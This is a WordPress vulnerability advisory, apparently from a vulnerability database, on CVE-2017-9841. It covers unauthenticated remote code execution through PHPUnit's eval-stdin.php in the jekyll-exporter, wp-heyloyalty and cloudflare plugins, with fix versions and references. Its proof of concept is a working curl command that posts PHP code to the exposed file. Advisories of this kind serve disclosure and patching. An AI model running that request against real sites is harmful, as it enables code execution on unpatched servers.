Multiple Plugins – Unauthenticated RCE via PHPUnit | CVE 2017-9841

Description

There was an Unauthenticated Remote Code Execution (RCE) vulnerability in PHPUnit, a widely used testing framework for PHP.

This vulnerability has been seen exploited in the wild.

Proof of Concept

curl -X POST --data "<?php echo php_uname(); ?>" http://example.com//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Affects Plugins

jekyll-exporter

Fixed in 2.2.1

wp-heyloyalty

No known fix

cloudflare

Fixed in 1.1.12

References

CVE

CVE-2017-9841

URL

https://github.com/cloudflare/Cloudflare-WordPress/commit/8a0bc0d127aacc2813f61cd40363850a44abbf6a#diff-b82987d84b852601e76964b488550a9255b3a189a14ec467441d974feb86ca69

URL

http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/

Classification

Type

RCE

OWASP top 10

A1: Injection

CWE

CWE-94

CVSS

9.8 (critical)

Miscellaneous

Verified

Yes

WPVDB ID

e2d902e3-9a38-46d1-bd3c-59f591e3419a

Timeline

Publicly Published

2017-08-26 (about 8 years ago)

Added

2020-03-16 (about 6 years ago)

Last Updated

2020-11-07 (about 5 years ago)

Other

Published

Title

Published

2014-08-01

Title

WPLocalPlaces - File Upload Remote Code Execution

Published

2025-05-02

Title

Motors - Car Dealer, Rental & Listing WordPress theme < 5.6.66 - Unauthenticated Arbitrary Shortcode Execution

Published

2024-11-27

Title

Widget Options < 4.0.8 - Contributor+ Remote Code Execution

Published

2024-04-24

Title

FOX – Currency Switcher Professional for WooCommerce < 1.4.1.9 - Unauthenticated Arbitrary Shortcode Execution

Published

2024-11-18

Title

WPB Popup for Contact Form 7 – Showing The Contact Form 7 Popup on Button Click – CF7 Popup < 1.7.6 - Unauthenticated Arbitrary Shortcode Execution via wpb_pcf_fire_contact_form